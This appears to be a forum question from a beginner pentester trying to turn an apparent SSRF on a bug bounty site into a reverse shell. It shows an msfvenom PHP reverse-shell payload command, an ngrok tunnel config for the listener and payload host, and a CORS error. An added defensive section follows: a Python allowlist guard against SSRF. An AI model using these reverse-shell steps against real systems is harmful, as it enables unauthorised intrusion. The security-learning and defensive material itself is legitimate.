How did I manage to reverse shell my own machine?
Beginner pentester here.
I'm testing a bug bounty website and found a potential SSRF by URL injection: trying to fetch another server in the PSF leads the server's backend to send several POST requests to said URL (tested using webhook.site).
My plan is to serve the target website a "reverse_shell.php" using an Apache server, and to listen with netcat on a different port. The problem is that I'm behind a router.
To avoid opening a port, I used ngrok with two endpoints: a TCP endpoint forwarding data to netcat and an HTTP endpoint forwarding to the Apache server. The reverse_shell.php is directed at the TCP endpoint of ngrok. Testing with a sleep.php file (`<?php sleep(10) ?>`) did yield the wanted outcome:
Even though I get a CORS error, it seems the site is executing the code. Here's the error description from the console (not sure it's relevant):
Access to fetch at 'https://ngrokendpoint.com/sleep.php?q=' from origin 'https://targetsite.com' has been blocked by CORS policy: Response to preflight request doesn't pass access control check: No 'Access-Control-Allow-Origin' header is present on the requested resource. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled.
When I attempt to exploit, I get a shell, but as www-data of my own Apache server (very anti-climactic). I got the same result when running reverse_shell.php on a different "victim" machine.
Is there something I'm missing? Also, this feels a bit too complicated. What is the best way to get a reverse shell when the listener is behind a router? Is there an easier way? Maybe some way not to do it behind the router?
Update: When I manually run reverse_shell.php from a "victim" machine, everything works well. Sadly, I don't have that kind of access to the target website's machine.
Reverse shell PHP: `msfvenom -p php/reverse_php`
Config file ngrok.yml:

    version: 3
    agent:
      authtoken: ---redacted---
    endpoints:
      - name: out_tunnel_name
        url: redacted.ngrok.com
        upstream:
          url: 80
        traffic_policy:
          on_http_request:
            - actions:
                - type: add-headers
                  config:
                    headers:
                      Access-Control-Allow-Origin: https://Targetsite.com
                      content-type: Application/x-httpd-php
                      sec-fetch-mode: no-cors
      - name: in_tunnel_name
        url: tcp://tcp.eu.ngrok.io:redactedport
        upstream:
          url: 1337
          protocol: tcp
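Added example, not from the poster or from any tool mentioned in the post: the bug described above is a backend that POSTs to a caller-supplied URL, so from the defender's side the fix is a guard that only lets the backend talk to hosts it is meant to talk to. The allowlist host `api.partner.example`, the resolver table in the test and the sample addresses are all constructed values; `validate_outbound_url()` takes an injectable resolver so it can be exercised offline and so every resolved address (not just the first) can be checked before any request is made.

```python
"""Outbound-URL guard for a backend "fetch/POST to this URL" feature (added example)."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Constructed allowlist: the only hostnames this backend is allowed to contact.
ALLOWED_HOSTS = {"api.partner.example"}


def default_resolver(host):
    """Resolve a hostname to the full set of IPv4/IPv6 addresses it maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_address(ip_text):
    """True only for globally routable unicast addresses.

    IPv4-mapped IPv6 (e.g. ::ffff:127.0.0.1) is unwrapped first so the
    loopback/private checks cannot be bypassed by re-encoding the address.
    """
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return not (
        ip.is_private or ip.is_loopback or ip.is_link_local
        or ip.is_multicast or ip.is_reserved or ip.is_unspecified
    )


def validate_outbound_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=default_resolver):
    """Return (ok, reason) for a URL the backend has been asked to call.

    Rejects non-HTTP schemes, embedded credentials, hosts outside the
    allowlist, and any host that resolves (wholly or partly) to a
    non-public address. The HTTP client that uses this guard must also
    refuse to follow redirects, or re-run the guard on every hop.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host.lower().rstrip(".") not in allowed_hosts:
        return False, "host not in allowlist"
    try:
        addresses = resolver(host)
    except OSError:
        return False, "resolution failed"
    if not addresses:
        return False, "no addresses"
    # Every address must pass: a name that resolves to one public and one
    # internal address (DNS rebinding / split answers) is rejected outright.
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"resolves to non-public address {addr}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed resolver table so the demo runs without network access.
    table = {"api.partner.example": {"93.184.216.34"}}
    fake_resolver = lambda h: table.get(h, set())
    for candidate in (
        "https://api.partner.example/hook",
        "https://attacker.example/collect",
        "file:///etc/passwd",
    ):
        print(candidate, "->", validate_outbound_url(candidate, resolver=fake_resolver))
```

The guard is deliberately an allowlist rather than a blocklist: a blocklist of "bad" addresses is what a webhook-style feature typically ships with, and it is exactly what gets routed around with DNS tricks, redirects and alternate address encodings.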